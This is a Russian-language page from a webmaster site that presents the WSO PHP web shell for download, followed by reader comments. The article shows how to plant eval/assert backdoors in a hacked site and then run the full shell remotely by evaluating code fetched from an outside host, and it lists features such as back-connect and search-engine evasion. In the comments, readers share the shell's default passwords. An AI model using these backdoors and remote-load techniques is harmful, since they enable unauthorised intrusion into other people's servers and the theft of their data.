prowebber.ru - Тут есть все для настоящих вебмастеров

Чтение RSS Мы в твиттере
Пока новый форум в разработке, можете смело заходить на Allweb.su - разбор кейсов, арбитраж трафика, работа с социальными сетями и складчина.
«    Август 2016    »
ПнВтСрЧтПтСбВс
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 

WSO - веб шелл


Данный материал предоставлен сайтом ProWebber.ru исключительно в ознакомительных целях. Администрация не несет ответственности за его содержимое.
У нас вы можете скачать бесплатно WSO - веб шелл.


WSO - веб шелл


Не то чтобы статья, но многим будет полезно. Итак, мы проникли в админку, мы в итоге смогли хоть куда-то впихнуть такой код, примеру:
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

или просто:
assert(stripslashes($_REQUEST[lala]));

stripslashes в данном случае исключительно для обхода magic_quotes=ON
Многие вставляют
system($_GET['cmd'])
и прочие безобразия, но это все лишнее, на самом деле все проще. Итак, вы вставили данный код куда-то (в faq.php, или у вас уже есть просто типо такой бекдор где-то в недрах скриптов сервера).
Т.е. в итоге вы к примеру добились работоспособности вот такого линка:
http://localhost/user.php?e=phpinfo();

И после этого у многих начинающих ступор. Немедленно следующий вопрос - а что же делать дальше?
А давайте повнимательнее взглянем на этот phpinfo, что нам вывело, основные два пункта, что нас будут интересовать в данной ситуации:
allow_url_fopen
allow_url_include


allow_url_include
- да, жесть конечно, но, как правило, off.

Остается
allow_url_fopen
, а он, как правило = ON. Как же мы может использовать данную возможность, безрассудно оставленную админом, чтобы не париться особо (не искать папки, доступные на запись и тому подобную ерунду выяснять да и вообще не заливать шелл как таковой, но лазить по серваку как-будто шелл уже залит). Да очень просто. Если
allow_url_fopen = ON
и у вас есть код, выводящий хотя бы
PHPINFO();
то считайте вы уже прочитали все конфиги, слили все что вам надо и т.д. (не путайте с "порутать", только то, что можно прочитать)

Берем последний шелл от глубокоуважаемого oRb, удаляем первую строчку:
<?php # Web Shell by oRb

+
удаляем последнюю
?>

+
можно удалить пароль, шелл ведь не заливаем, просто юзаем, не оставляя

сохраняем на любой хост как bla_bla.txt (тот же narod.ru вполне подойдет) или в виде картинки на файлообменнике, предоставляющем прямые ссылки на скачку контента и делаем такой запрос:
Код:
http://localhost/user.php?a=eval(file_get_contents('http://site.ru/bla_bla.txt'));

Всё. У вас полноценный шелл без физического его залития на сервак со всеми обычными возможностями шелла. Спасибо за внимание
PS: tested on WSO2.4 (wso2_pack.php)

Описание шелла:
Авторизация
Информация о сервере
Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
Просмотр, hexview, редактирование, давнлоад, аплоад файлов
Работа с zip архивами (упаковка, распаковка)
Консоль
SQL менеджер (MySql, PostgreSql)
Выполнение PHP кода
Работа со строками + поиск хеша в онлайн базах
Биндпорт и бек-коннект (Perl)
Поиск текста в файлах
*nix/Windows
Из фишек
Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
Можно использовать AJAX
Малый вес (24.32 KB)
Выбор кодировки, в которой работает шелл.

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Автор статьи: Pashkela
Автор шелла: oRb

Архив содержит последнюю версию шелла и небольшую тулзу WSOmanager - для работы с шеллами.

Скачать шелл:
Внимание! У вас нет прав для просмотра скрытого текста.


0
Просмотры: 18578 VIP ProWebber | Комментарии (21)
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

#1hecz

  • 9 ноября 2010 16:13
  • Регистрация: 24.02.2010
  • ICQ: 791833
  • Комментариев: 92
а какой $auth_pass = "63a9f0ea7bb98050796b649e85481845";

--------------------

0

#2Пряник

  • 9 ноября 2010 16:35
  • Регистрация: 26.09.2010
  • ICQ: 1422995
  • Комментариев: 53
Зачетно! Надо испытать как нибудь на досуге...

0

#3artur3333

  • 9 ноября 2010 16:40
  • Регистрация: 9.09.2010
  • ICQ: 48888816
  • Комментариев: 89
спс,протестим ! Может кто поможет разобратся с этим всем?

--------------------

0

#4DEADok

  • 9 ноября 2010 16:49
  • Регистрация: 8.11.2009
  • ICQ: --
  • Комментариев: 49
паролько какой чтобы этот шел юзать?

0

#5f1xed

  • 9 ноября 2010 17:32
  • Регистрация: 18.02.2010
  • ICQ: 626575
  • Комментариев: 79
хорошая очень вещь
для тех, кто в танке: пароль в мд5, если его расшифровать, то получится root
пароль для шелла: root

--------------------

0

#6alexcreew

  • 10 ноября 2010 11:51
  • Регистрация: 10.11.2010
  • ICQ: --
  • Комментариев: 11
Да, вещица хорошая

0

#7gad

  • 10 ноября 2010 22:52
  • Регистрация: 7.11.2010
  • ICQ: 238184827
  • Комментариев: 1
ой бля я не могу Админ, меня пед*раса фотку Выложыл бля бля yahoo rofl

0

#8laid18

  • 11 ноября 2010 00:14
  • Регистрация: 21.10.2010
  • ICQ: --
  • Комментариев: 62
gad,
Ты наверное на провеббер доступа хочеш лешится?!

0

#9Dr. Neo

  • 11 ноября 2010 01:41
  • Регистрация: 3.12.2009
  • ICQ: 370771525
  • Комментариев: 400
  • Выкл.
Хватит бл*ть х*йню писать. Никто сюда уже ничего не зальет нах!

-1

#10Joey

  • 17 ноября 2010 18:26
  • Регистрация: 5.01.2010
  • ICQ: 963285
  • Комментариев: 266
WSOmanager
а от него какой пароль?

--------------------

0

#11WebSupport

  • 17 ноября 2010 19:00
  • Регистрация: 15.11.2010
  • ICQ: --
  • Комментариев: 225
А какой от него толк вообще?

0

#12mitrushi

  • 17 ноября 2010 19:16
  • Регистрация: 4.01.2010
  • ICQ: --
  • Комментариев: 160
Цитата: Joey
WSOmanagerа от него какой пароль?

логин: root
пароль: toor
и пароль для самого шелла: root

--------------------

0

#13WebSupport

  • 17 ноября 2010 19:19
  • Регистрация: 15.11.2010
  • ICQ: --
  • Комментариев: 225
mitrushi, благодарю

0

#14Rednex

  • 8 июня 2011 18:51
  • Регистрация: 8.06.2011
  • ICQ: --
  • Комментариев: 10
спасибо за статью )

0

#15mitrushi

  • 10 октября 2011 00:15
  • Регистрация: 4.01.2010
  • ICQ: --
  • Комментариев: 160
Многоуважаемый oRb обновил шелл до версии WSO 2.5.1

--------------------

0

#16IceSkip

  • 10 октября 2011 00:32
  • Регистрация: 11.08.2011
  • ICQ: 863118
  • Комментариев: 149
gj.pf. yf ljceut//,kfujlfh. pf byae

прикольно,надо будет попробовать на досуге,благодарю

--------------------

0

#17Serj566

  • 26 декабря 2011 13:41
  • Регистрация: 17.12.2011
  • ICQ: --
  • Комментариев: 1
Надо попробовать этот способ!

0

#18evgeny56

  • 30 июня 2012 14:44
  • Регистрация: 28.06.2012
  • ICQ: --
  • Комментариев: 11
спасибо за статью angel

0

#19suord

  • 19 декабря 2012 05:27
  • Регистрация: 15.11.2010
  • ICQ: --
  • Комментариев: 21
спасибо интересно почитать било

0

#20Vinny_pad

  • 22 марта 2014 18:20
  • Регистрация: 5.07.2013
  • ICQ: --
  • Комментариев: 45
постер вообще в тему

--------------------

0
1 2
Предыдущая    Следующая
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.

Поддержи сайт
Скрипты, cms, шаблоны, статьи по раскрутке

Опросы

Как часто вы бываете на сайте?

Захожу 1-2 раза в день
1-2 часа в сутки
Более 2 часов
Почти целый день тут smile

Архив новостей
Август 2016 (9)
Июль 2016 (14)
Июнь 2016 (17)
Май 2016 (26)
Апрель 2016 (14)
Март 2016 (26)

Последние комментарии:

  • Всё для IPB
  • Информер

Искать людей

Ваши переписки